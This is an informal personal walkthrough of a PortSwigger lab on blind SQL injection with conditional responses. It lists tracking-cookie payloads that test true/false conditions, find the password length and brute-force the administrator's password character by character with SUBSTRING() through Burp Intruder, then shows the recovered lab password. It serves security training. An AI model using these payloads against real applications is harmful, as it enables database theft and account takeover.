SQL injection labs

Lab: Blind SQL injection with conditional responses

The application uses a tracking cookie for analytics

The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

Cookie: TrackingId=St10uonYH4szuC66

Cookie: TrackingId=St10uonYH4szuC66' AND '1'='1 #true
Cookie: TrackingId=St10uonYH4szuC66' AND '1'='2  #false

ok i will use limit

' AND (SELECT 'X' from users limit 1)='x'--

ok i will try use table users and column username

AND+(SELECT+username+FROM+users+WHERE+username='administrator')='administrator'--

ok in this case i'll tracking passsword using SUBSTRING() function to extract a single character from the password

' AND (SELECT username FROM users WHERE username='administrator' and LENGTH(password)>1)='administrator'--

i will try numbers 1 to 19 all valid password >19

go to intruder > cluster bomb

'+AND+(SELECT+substring(password,1,1)+FROM+users+WHERE+username%3d'administrator')%3d'8'--

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20
8oiqhj3w6k9bfypfq7j1

offfffffffffffffffffffffff! 😄 🎉

PreviousPortSwigger NextExploiting XXE to retrieve data by repurposing a local DTD

Last updated 1 year ago